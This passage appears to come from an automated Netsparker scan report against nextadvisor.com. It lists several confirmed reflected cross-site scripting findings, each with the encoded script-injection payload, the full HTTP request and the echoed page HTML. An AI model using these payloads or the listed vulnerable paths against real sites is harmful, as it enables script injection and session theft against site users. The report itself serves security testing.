Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option 
value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x0001B0)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="index.php">Overview</a> <span class="nav_border">|</span> <a href="cash_back.php">Cash Back</a><span class="nav_border">|</span><a href="travel_rewards.php">Travel</a><span class="nav_border">|</span> <a href="rewards_card.php">Rewards</a><span class="nav_border">|</span> <a href="student_card.php">Student</a><span 
class="nav_border">|</span> <a href="low_APR.php">Low APR</a><span class="nav_border">|</span> <a href="poor_credit.php">Poor Credit</a><span class="nav_border">|</span> <a href="faqs.php">FAQ</a><span class="nav_border">|</span> <a href="../blog/">Blog</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--><script>function checkForm() { hideAllErrors(); var formIsValid = showErrorAndFocusIf('FieldData0', isEmpty, 'nameError') && showErrorAndFocusIf('FieldData2', isEmpty, 'emailError') && showErrorAndFocusIf('FieldData2', isAnInvalidEmail, 'emailError2') && showErrorAndFocusIf('FieldData1', isEmpty, 'questionError'); return formIsValid;}function showErrorAndFocusIf(fieldId, predicate, errorId) { var field = document.getElementById(fieldId); if (predicate(field)) { document.getElementById(errorId).style.display = 'inline'; if (field.select) { field.select(); } field.focus(); return false; } return true;}function isEmpty(field) { return field.value == '';}function isAnInvalidEmail(field) { var email = field.value; var ok = "1234567890qwertyuiop[]asdfghjklzxcvbnm.@-_QWERTYUIOPASDFGHJKLZXCVBNM"; for(i = 0; i < email.length; i++){ if(ok.indexOf(email.charAt(i)) < 0) { return true; } } re = /(@.*@)|(\.\.)|(^\.)|(^@)|(@$)|(\.$)|(@\.)/; re_two = /^.+\@(\[?)[a-zA-Z0-9\-\.]+\.([a-zA-Z]{2,4}|[0-9]{1,3})(\]?)$/; return re.test(email) || !re_two.test(email);}function hideAllErrors() { document.getElementById("nameError").style.display = "none" 
document.getElementById("emailError").style.display = "none" document.getElementById("emailError2").style.display = "none" document.getElementById("questionError").style.display = "none"}</script><!--Start Content--><div id="content" class="img_left"><!--Start Left Content--> <div id="left_content"> <div class="img_left"><img src="/images/category_icons/credit_cards_icon.gif" alt="" /> </div> <h1 style="padding:5px 0px 5px 15px;"> Credit Cards FAQ</h1> <p>Frequently Asked Questions about Credit Cards</p> <ul class=""> </ul> <br> <div style="padding:5px; padding-top:1px; background:#eeffff; margin-right:10px;"> <span class="latest"><p><strong>Search our site for more information about Credit Cards:</strong></p></span> <form action="http://www.nextadvisor.com/answers.php" id="cse-search-box"> <div> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:10" /> <input type="hidden" name="ie" value="UTF-8" /> <input type="text" name="q" size="31" /> <input type="submit" name="sa" value="Search" /> </div> </form> </div> <div> <p>If you can't find the question you're looking for, you can ask it here. Due to volume, we aren't able to respond to every question, but we answer as many as we can on the NextAdvisor.com blog. 
<form onSubmit="return checkForm();" method="post" action="http://www.emailmeform.com/fid.php?formid=303001" name="form1"> <div> <p><label for="FieldData0"><strong>Name:</strong></label> <input type="text" name="FieldData0" id="FieldData0" value="" size="22" tabindex="1" /></p> </div> <div class="error" id="nameError"> Required: Please enter your name </div> <div> <p><label for="FieldData2"><strong>Email</strong> (will not be published)<strong>:</strong> </label><input type="text" name="FieldData2" id="FieldData2" value="" size="22" tabindex="2" /></p> </div> <div class="error" id="emailError"> Required: Please enter your email address </div> <div class="error" id="emailError2"> This doesn't look like a real email address, please check and reenter </div> <div> <p><label for="FieldData3"></label> <input type="hidden" name="FieldData3" value="credit_cards"> <input type="hidden" name="FieldData4" 
..
- /credit_cards/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001BC)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001BC)%3C/script%3E

/credit_cards/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001BC)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001BC)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/credit_cards/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsp..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x0001BC)</script>

Request

GET /credit_cards/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001BC)%3C/script%3E.php HTTP/1.1
Referer: http://www.nextadvisor.com/credit_cards/index.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:56:54 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 8510
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title> - NextAdvisor.com</title><meta name="description" content=""/><meta name="keywords" content=", credit card, credit cards, cash rebate, gas rebates, balance transfer, student credit cards, bad credit, TrueEarnings&#174; Card from Costco and American Express, Miles by Discover&#174; Card, Discover&#174; Open Road Card, American Express&#174; Premier Rewards Gold Card, Chase Sapphire<sup><small>SM</small></sup>, Blue<sup><small>SM</small></sup> from American Express, Chase Freedom&#174; $100 Bonus Cash Back Visa, Chase Freedom&#174; $100 Bonus Cash Back MasterCard, Discover&#174; More Card, Blue Cash&#174; from American Express, Blue Sky from American Express<sup><small>SM</small></sup>, Discover&#174; Motiva Card, Discover&#174; Student Card, Slate<sup><small>SM</small></sup> with Blueprint, Discover&#174; Student Open Road Card, Public Savings Bank Open Sky Secured Visa&#174;, PrePaid Visa&#174; RushCard" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/credit_cards/index.php'"--></style></script><script>netsparker(0x0001BC)</script>.php" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script 
type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) }catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content Container--> <!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option 
value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x0001BC)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="script%3E.php" class='link_off'>Overview</a> <span class="nav_border">|</span> <a href="cash_back.php">Cash Back</a><span class="nav_border">|</span><a href="travel_rewards.php">Travel</a><span class="nav_border">|</span> <a href="rewards_card.php">Rewards</a><span 
class="nav_border">|</span> <a href="student_card.php">Student</a><span class="nav_border">|</span> <a href="low_APR.php">Low APR</a><span class="nav_border">|</span> <a href="poor_credit.php">Poor Credit</a><span class="nav_border">|</span> <a href="faqs.php">FAQ</a><span class="nav_border">|</span> <a href="../blog/">Blog</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--><script>function checkForm() { hideAllErrors(); var formIsValid = showErrorAndFocusIf('FieldData0', isEmpty, 'nameError') && showErrorAndFocusIf('FieldData2', isEmpty, 'emailError') && showErrorAndFocusIf('FieldData2', isAnInvalidEmail, 'emailError2') && showErrorAndFocusIf('FieldData1', isEmpty, 'questionError'); return formIsValid;}function showErrorAndFocusIf(fieldId, predicate, errorId) { var field = document.getElementById(fieldId); if (predicate(field)) { document.getElementById(errorId).style.display = 'inline'; if (field.select) { field.select(); } field.focus(); return false; } return true;}function isEmpty(field) { return field.value == '';}function isAnInvalidEmail(field) { var email = field.value; var ok = "1234567890qwertyuiop[]asdfghjklzxcvbnm.@-_QWERTYUIOPASDFGHJKLZXCVBNM"; for(i = 0; i < email.length; i++){ if(ok.indexOf(email.charAt(i)) < 0) { return true; } } re = /(@.*@)|(\.\.)|(^\.)|(^@)|(@$)|(\.$)|(@\.)/; re_two = /^.+\@(\[?)[a-zA-Z0-9\-\.]+\.([a-zA-Z]{2,4}|[0-9]{1,3})(\]?)$/; return re.test(email) || !re_two.test(email);}function hideAllErrors() 
{ document.getElementById("nameError").style.display = "none" document.getElementById("emailError").style.display = "none" document.getElementById("emailError2").style.display = "none" document.getElementById("questionError").style.display = "none"}</script><!--Start Content--><div id="content" class="img_left"><!--Start Left Content--> <div id="left_content"> <div class="img_left"><img src="/images/category_icons/credit_cards_icon.gif" alt="" /> </div> <h1 style="padding:5px 0px 5px 15px;"> Credit Cards FAQ</h1> <p>Frequently Asked Questions about Credit Cards</p> <ul class=""> </ul> <br> <div style="padding:5px; padding-top:1px; background:#eeffff; margin-right:10px;"> <span class="latest"><p><strong>Search our site for more information about Credit Cards:</strong></p></span> <form action="http://www.nextadvisor.com/answers.php" id="cse-search-box"> <div> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:10" /> <input type="hidden" name="ie" value="UTF-8" /> <input type="text" name="q" size="31" /> <input type="submit" name="sa" value="Search" /> </div> </form> </div> <div> <p>If you can't find the question you're looking for, you can ask it here. Due to volume, we aren't able to respond to every question, but we answer as many as we can on the NextAdvisor.com blog. 
<form onSubmit="return checkForm();" method="post" action="http://www.emailmeform.com/fid.php?formid=303001" name="form1"> <div> <p><label for="FieldData0"><strong>Name:</strong></label> <input type="text" name="FieldData0" id="FieldData0" value="" size="22" tabindex="1" /></p> </div> <div class="error" id="nameError"> Required: Please enter your name </div> <div> <p><label for="FieldData2"><strong>Email</strong> (will not be published)<strong>:</strong> </label><input type="text" name="FieldData2" id="FieldData2" value="" size="22" tabindex="2" /></p> </div> <div class="error" id="emailError"> Required: Please enter your email address </div> <div class="error" id="emailError2"> This doesn't look like a real email address, please check and reenter </div> <div> <p><label for="FieldData3"></label> <input type="hidden" name="FieldData3" value="credit_cards"> <input type="hidden" name="FieldData4" value="..
- /diet_services/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001D1)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001D1)%3C/script%3E

/diet_services/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001D1)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001D1)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/diet_services/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x0001D1)</script>

Request

GET /diet_services/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001D1)%3C/script%3E.php HTTP/1.1
Referer: http://www.nextadvisor.com/diet_services/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:57:06 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 6848
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title> - NextAdvisor.com</title><meta name="description" content=""/><meta name="keywords" content=", diet reviews, online diet, glycemic index diet, low glycemic diet, low carb diet, best weight loss plan, weight loss plans, diet programs, best diet, lose weight, weight loss programs, meal delivery reviews, atkins diet" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/diet_services/'"--></style></script><script>netsparker(0x0001D1)</script>.php" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) }catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new 
services.</p> </div> <!-- /header --> <!--Start Content Container--> <!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option 
value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x0001D1)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="index.php">Overview</a> <span class="nav_border">|</span> <a href="compare_diy.php">DIY Diets</a> <span class="nav_border">|</span> <a href="compare_meals.php">Meal Plan Diets</a> <span class="nav_border">|</span> <a href="/diet_services/taste_test.php">Taste Test</a> <span class="nav_border">|</span> <a href="faqs.php">FAQ</a><span class="nav_border">|</span> <a href="../blog/">Blog</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" 
src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--><script>function checkForm() { hideAllErrors(); var formIsValid = showErrorAndFocusIf('FieldData0', isEmpty, 'nameError') && showErrorAndFocusIf('FieldData2', isEmpty, 'emailError') && showErrorAndFocusIf('FieldData2', isAnInvalidEmail, 'emailError2') && showErrorAndFocusIf('FieldData1', isEmpty, 'questionError'); return formIsValid;}function showErrorAndFocusIf(fieldId, predicate, errorId) { var field = document.getElementById(fieldId); if (predicate(field)) { document.getElementById(errorId).style.display = 'inline'; if (field.select) { field.select(); } field.focus(); return false; } return true;}function isEmpty(field) { return field.value == '';}function isAnInvalidEmail(field) { var email = field.value; var ok = "1234567890qwertyuiop[]asdfghjklzxcvbnm.@-_QWERTYUIOPASDFGHJKLZXCVBNM"; for(i = 0; i < email.length; i++){ if(ok.indexOf(email.charAt(i)) < 0) { return true; } } re = /(@.*@)|(\.\.)|(^\.)|(^@)|(@$)|(\.$)|(@\.)/; re_two = /^.+\@(\[?)[a-zA-Z0-9\-\.]+\.([a-zA-Z]{2,4}|[0-9]{1,3})(\]?)$/; return re.test(email) || !re_two.test(email);}function hideAllErrors() { document.getElementById("nameError").style.display = "none" document.getElementById("emailError").style.display = "none" document.getElementById("emailError2").style.display = "none" document.getElementById("questionError").style.display = "none"}</script><!--Start Content--><div id="content" class="img_left"><!--Start Left Content--> <div id="left_content"> <div class="img_left"><img src="/images/category_icons/diets_icon.gif" alt="" /> </div> <h1 style="padding:5px 0px 5px 15px;"> Online Diet Programs FAQ</h1> <p>Frequently Asked Questions about Online Diet Programs</p> <ul class=""> </ul> <br> <div style="padding:5px; padding-top:1px; background:#eeffff; margin-right:10px;"> <span class="latest"><p><strong>Search our site for more information about Online Diet 
Programs:</strong></p></span> <form action="http://www.nextadvisor.com/answers.php" id="cse-search-box"> <div> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:10" /> <input type="hidden" name="ie" value="UTF-8" /> <input type="text" name="q" size="31" /> <input type="submit" name="sa" value="Search" /> </div> </form> </div> <div> <p>If you can't find the question you're looking for, you can ask it here. Due to volume, we aren't able to respond to every question, but we answer as many as we can on the NextAdvisor.com blog. <form onSubmit="return checkForm();" method="post" action="http://www.emailmeform.com/fid.php?formid=303001" name="form1"> <div> <p><label for="FieldData0"><strong>Name:</strong></label> <input type="text" name="FieldData0" id="FieldData0" value="" size="22" tabindex="1" /></p> </div> <div class="error" id="nameError"> Required: Please enter your name </div> <div> <p><label for="FieldData2"><strong>Email</strong> (will not be published)<strong>:</strong> </label><input type="text" name="FieldData2" id="FieldData2" value="" size="22" tabindex="2" /></p> </div> <div class="error" id="emailError"> Required: Please enter your email address </div> <div class="error" id="emailError2"> This doesn't look like a real email address, please check and reenter </div> <div> <p><label for="FieldData3"></label> <input type="hidden" name="FieldData3" value="diet_services"> <input type="hidden" name="FieldData4" 
value="..
- /diet_services/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001DE)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001DE)%3C/script%3E

/diet_services/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001DE)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001DE)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/diet_services/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enets..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x0001DE)</script>

Request

GET /diet_services/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001DE)%3C/script%3E.php HTTP/1.1
Referer: http://www.nextadvisor.com/diet_services/index.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:57:09 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 6864
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title> - NextAdvisor.com</title><meta name="description" content=""/><meta name="keywords" content=", diet reviews, online diet, glycemic index diet, low glycemic diet, low carb diet, best weight loss plan, weight loss plans, diet programs, best diet, lose weight, weight loss programs, meal delivery reviews, atkins diet" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/diet_services/index.php'"--></style></script><script>netsparker(0x0001DE)</script>.php" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) }catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new 
services.</p> </div> <!-- /header --> <!--Start Content Container--> <!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option 